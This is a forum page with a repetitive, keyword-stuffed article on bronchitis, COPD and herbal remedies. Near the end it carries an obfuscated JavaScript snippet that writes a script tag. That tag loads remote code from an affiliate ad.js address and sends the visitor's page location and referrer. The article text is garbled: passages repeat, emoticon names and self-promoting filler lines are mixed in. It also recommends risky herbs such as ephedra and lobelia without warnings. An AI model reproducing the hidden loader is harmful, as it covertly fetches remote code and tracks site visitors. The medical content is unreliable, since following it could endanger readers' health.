what is bronchitis

Answers about bronchitis symptons

You are not connected. Please login or register

Bronchitis Arzt. Natural Remedies Explored. Bronchitis

View previous topic View next topic Go down  Message [Page 1 of 1]

Admin

Admin

Bronchitis

Had a very bad bout of bronchitis years ago, which led to a chronic asthma condition. I lost 2 stone in weight over a 2 month period and I had little idea of how to deal with the debilitating illness...I was frequently struggling to be able to breathe. It's not something I would like to go through again, but it took me the best part of two years to get to grips with the condition.

• The first step is to remove wheat and milk products from the diet (before you panic, this is only a temporary measure).
  • Why you ask?
  • Because when you have a cold or bronchitis the body produces more mucus and you do not want to add to this by eating mucus producing foods.
  • I know some of you will be sceptical, but what have you got to lose...just try it and see.
  • As a child I often had winter colds that developed into bronchitis, with the inevitable regular visit to the doctor.
  • Every time antibiotics were prescribed, why I do not know, but I believe this was what led to me developing asthma later in life.
  • Colds are caused by viruses and are not killed by antibiotics, which kill bacteria, all bacteria even the necessary one's that help with digestion.
  • In addition to weakening the digestive system the bodies immune system is also compromised as it has lost a vital ally in fighting yeast and fungi.
  • These are always present in the body but the good gut bacteria keep them in check.
  • Mainstream medicine now recognises the effect Candida can have on a compromised immune system, although you might still counter some scepticism.
  • Alternative medicine has known about it for a long time.
  • If you do have to use antibiotics then it is sensible to repopulate your gut with good bacteria.
  • There are now plenty of probiotic products available, many advertised on the TV.
  • Ignorance is bliss, is it?
  • Isn't it better to learn more than not to know about something like Cold Bronchitis.
  • So we have produced this article so that you can learn more about it!

Also try adding garlic, onions, ginger, chillies, cloves and liquorice (not the sweets, but do not take if you have high blood pressure) to your diet, as they all act as decongestants. The following herbs are also very useful: astragalus, coltsfoot, echinacea, elderberry, elecampane, ephedra, eucalyptus, fenugreek, gingko, goldenseal, lobelia, mullein oil and reishi. A rolling stone gathers no moss. So if I just go on writing, and you don't understand, then it is of no use of me writing about Bronchitis! Whatever written should be understandable by the reader. Idea

• Through experience and from reading many health books I now know why my colds developed into bronchitis.
  • I know it's a damn nuisance but we cannot avoid colds.
  • However, we can make life much easier for ourselves. Shocked
  • Please feel free to let me have any tips of your own.
  • I have a keen interest in using natural remedies and have had years of experience in using herbs and homeopathy.

COPD is Chronic Obstructive Pulmonary Disease

COPD refers to a group of diseases that include chronic bronchitis, emphysema and asthmatic bronchitis. COPD is a lung disease, mainly caused by smoking. COPD progresses gradually and worsens over time. The rate of progression and severity of symptoms may differ from one individual to another. COPD cannot be cured, though it can be controlled. A common characteristic of these diseases is the difficulty to breathe out of the lungs. Cystic fibrosis, bronchiectesis and genetic forms of emphysema may also cause COPD. Progression of the disease is associated with degradation of elastin in the walls of the alveoli, resulting in the functional destruction of the organs concerned.

The United States, 90% of COPD Occurs Due to Smoking

Only about 15% of chronic smokers will go on to develop clinically significant COPD. Once diagnosed with COPD, it is essential to give up smoking. Although cessation of smoking can help to slow the progression of the disease, currently, there is no effective treatment for COPD. Needless to say, COPD is one of the greatest health problems facing America and the world today. Rolling Eyes

Symptoms Range from the Hardly Noticeable to the Unbearable

Early symptoms of COPD include daily morning coughs with clear sputum. During a cold or other respiratory infection, the cough may become more noticeable, and the sputum turns yellow or greenish. After a cold or respiratory infection, wheezing may occur. COPD is referred to as the silent disease because symptoms generally progress slowly and almost unnoticeably. At first shortness of breath occurs during exercise. Patients with COPD may experience difficulty in breathing, chronic cough, weight loss and periods of symptoms so severe, they require hospitalization.

There is a direct causal relationship between COPD and smoking, clearly indicated in COPD progression. In many cases, after 10 years of smoking, a person develops a chronic cough with the production of a small amount of sputum. At the age of 40, there is only shortness of breath during exertion. But by the age of 50, the shortness of breath becomes more common. This is followed by a morning cough related to smoking. These symptoms may not seem serious at first, but they gradually progress to the point where activities of daily living, such as walking, dressing and even eating, cause extreme shortness of breath. Laughing

Had a very bad bout of bronchitis years ago, which led to a chronic asthma condition. I lost 2 stone in weight over a 2 month period and I had little idea of how to deal with the debilitating illness...I was frequently struggling to be able to breathe. It's not something I would like to go through again, but it took me the best part of two years to get to grips with the condition.

Through experience and from reading many health books I now know why my colds developed into bronchitis. I know it's a damn nuisance but we cannot avoid colds. However, we can make life much easier for ourselves. Keeping to the point is very important when writing. So we have to stuck to Cold Bronchitis, and have not wandered much from it to enhance understanding.

Also try adding garlic, onions, ginger, chillies, cloves and liquorice (not the sweets, but do not take if you have high blood pressure) to your diet, as they all act as decongestants. The following herbs are also very useful: astragalus, coltsfoot, echinacea, elderberry, elecampane, ephedra, eucalyptus, fenugreek, gingko, goldenseal, lobelia, mullein oil and reishi. Evil or Very Mad

Please Feel Free to Let Me Have Any Tips of Your Own

I have a keen interest in using natural remedies and have had years of experience in using herbs and homeopathy. We have used a mixture of seriousness and jokes in this composition on Bronchitis. This is to liven the mood when reading about Bronchitis.

• As a child I often had winter colds that developed into bronchitis, with the inevitable regular visit to the doctor.
  • Every time antibiotics were prescribed, why I do not know, but I believe this was what led to me developing asthma later in life.
  • Colds are caused by viruses and are not killed by antibiotics, which kill bacteria, all bacteria even the necessary one's that help with digestion.
  • In addition to weakening the digestive system the bodies immune system is also compromised as it has lost a vital ally in fighting yeast and fungi.
  • These are always present in the body but the good gut bacteria keep them in check.
  • Mainstream medicine now recognises the effect Candida can have on a compromised immune system, although you might still counter some scepticism.
  • Alternative medicine has known about it for a long time.
  • If you do have to use antibiotics then it is sensible to repopulate your gut with good bacteria.
  • There are now plenty of probiotic products available, many advertised on the TV.
  • The first step is to remove wheat and milk products from the diet (before you panic, this is only a temporary measure).
  • Why you ask?
  • Because when you have a cold or bronchitis the body produces more mucus and you do not want to add to this by eating mucus producing foods.
  • I know some of you will be sceptical, but what have you got to lose...just try it and see.
  • It is always better to use simple English when writing descriptive articles, like this one on Cold Bronchitis.
  • It is the layman who may read such articles, and if he can't understand it, what is the point of writing it?

Acute Bronchitis can be Caused by an Inflammation in the Bronchial Tubes

These are the passages that allow air to go to the lungs, through the windpipe. The information can appear for two reasons: an irritation, the most common one can be because of smoking, or an infection.

You are diagnosed with acute bronchitis, you may seek a treat meant or just let it pass for itself. Most people that have acute bronchitis can get better without treatment, although they might cough for some days after the other symptoms have disappear. In some cases, couching can last up to months, often the person has been cured from caute bronchitis, because the bronchial linings still suffer from irritation. We found it rather unbelievable to find out that there is so much to learn on Bronchitis Sore Throat! Wonder if you could believe it after going through it! Shocked

To diagnose acute bronchitis is a little bit difficult, because of the likeness of the symptoms to other symptoms of different diseases. The first thing that your doctor will ask you is you have had problems with your respiratory system in the past months. like infections. Then he will look for sounds that can indicate him if your airways are blocked. For that the doctor will listen your chest using a stethoscope. Another way to diagnose cure bronchitis quickly test the oxygen level in your blood. Nothing abusive about Bronchitis have been intentionally added here. Whatever it is that we have added, is all informative and productive to you.

• Is not very easy to prevent acute bronchitis, but there are things to do where preventing is concerned.
  • For people who smoke, quitting is the first thing to do if you want to protect yourself against acute bronchitis.
  • Also getting shots against the flu is another must.
  • After many hopeless endeavors to produce something worthwhile on Bronchitis Symptoms, this is what we have come up with.
  • We are very hopeful about this!
  • When you catch a cold or the flu and your respiratory system becomes ill, this is the starting point for acute bronchitis.
  • The infection then travels into your airways, through your throat.
  • A good thing is that acute bronchitis does not last as long as pneumonia does.
  • Another thing for you to know is that acute bronchitis is usually caused by some viruses, but you can get this disease because of a bacteria as well.

Coughing is the First and Most Obvious Sign that You Have Acute Bronchitis

There are two types of cough that can accompany acute bronchitis: a dry one, or a cough that produces sputum, a substance that is like mucus and is brought from the lungs. Besides couching, if you suffer from acute bronchitis you may also have a sore throat, chest pains, fever, always be tired and you may also have problems breathing. Laughing

Throughout the US, more than 8 million Americans reportedly suffer from chronic bronchitis. Chronic bronchitis is an inflammation or swelling of the breathing tubes (bronchi) and may result in constant coughing or expectoration at least three months of the year for two or more years consecutively. The known causes for chronic bronchitis include bacteria, viruses, dust, and most commonly, tobacco smoke. Chronic bronchitis is an annoying ailment that affects millions of Americans, but with various natural remedies and treatments, coupled with proper medical treatment in care, it is possible to lessen or alleviate the symptoms of chronic bronchitis.

There are many different natural treatments for chronic bronchitis duration of illness proven effective. Make sure to consult your doctor before using any natural method, and make sure it will not interfere with medical treatments for chronic bronchitis, or any other conditions you may have. With any disease, it is a great idea to treat yourself right and remain healthy. A healthy body is much more able to resist and fight disease. Eat right, exercise, and make sure you take any vitamins or minerals recommended by your physician. It may take some time to comprehend the matter on Acute Bronchitis that we have listed here. However, it is only through it's complete comprehension would you get the right picture of Acute Bronchitis.

Herbal Treatments and Remedies

Several different herbs have been linked with easing congestion of the lungs and passageways, the most popular of which is thyme, an herb commonly found in households across America. The most common method for ingesting thyme is in a tea. Mix a teaspoon of thyme into a boiling pot of water for 10 minutes, adding honey for taste as necessary. Thyme helps to loosen phlegm and mucus in the lungs and passageways and to ease breathing.

Defeating Chronic Bronchitis With a Proper Diet

Cayenne peppers have long been recorded as combatants of the symptoms of chronic bronchitis as well as acute bronchitis. Cayenne helps break up congestion of the chest and lessens expectoration. This will also help you breathe more easily and get to sleep faster. The key for using diet to lessen the symptoms of chronic bronchitis is to eat smart and healthy. Fruits and vegetables are edp college sources of the vitamins and minerals your body needs to help your immune system fight infections. Try to avoid dairy products as much as possible because dairy products are known to increase mucus production, and will only worsen the symptoms. Garlic is also known to possess antiviral and antibacterial qualities. We are proud to say we have dominance in the say of Chronic Bronchitis Treatment. This is because we have read vastly and extensively on Chronic Bronchitis Treatment.

Massage as Chronic Bronchitis Treatment

Massaging of the back, chest, and upper body can help to relieve congestion in the lungs and respiratory system. You can either pay to have a massage professionally done (make sure to inform them of your condition, as it may affect how the massage should be done) or you can teach yourself how to properly perform the massage on yourself. There are many guides on self-massaging available on the Internet. The development of Bronchitis Acute Bronchitis has been explained in detail in this article on Bronchitis antibiotic patients. Read it to find something interesting and surprising!

Dr. Med. Arzt Für Lungen- Und Bronchial- Erkrankungen Und Allergologe

Aroma Therapy

Breathing in eucalyptus has been very successful in treating the symptoms of chronic bronchitis. The fumes of eucalyptus are known to help with breathing and lessening of the production of mucus in the upper respiratory system. Place a few drops of eucalyptus oil either on your hands, or on a warm, wet, washrag and place over your face for a few minutes, every few hours throughout the day for added relief.

var c2="bronchitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

View user profile http://elliotknox6.americantalk.net

View previous topic View next topic Back to top  Message [Page 1 of 1]

Permissions in this forum:
You cannot reply to topics in this forum